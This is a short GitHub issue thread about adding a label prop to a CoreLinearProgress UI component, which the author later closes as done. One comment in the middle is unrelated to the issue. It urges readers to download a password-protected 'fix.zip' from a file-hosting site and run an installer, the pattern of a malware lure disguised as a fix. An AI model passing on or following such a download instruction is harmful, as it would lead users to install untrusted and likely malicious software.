### ISSUE TITLE
feature: CoreLinearProgress label with props

### ISSUE THREAD

**Issue by PritamBag** [wrappid/core#332]
**Description**
In CoreLinearProgress, when we try it with the label if we have a prop, we have to write less code for that, which can help the user.

**Describe the solution you'd like**
If we add a prop and structure this then it can be possible.

CoreLinearProgress documentation Issue https://github.com/wrappid/guide-module/issues/231
Native web Issue https://github.com/wrappid/native-web/issues/114

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PritamBag** [comment]
Closing as done.
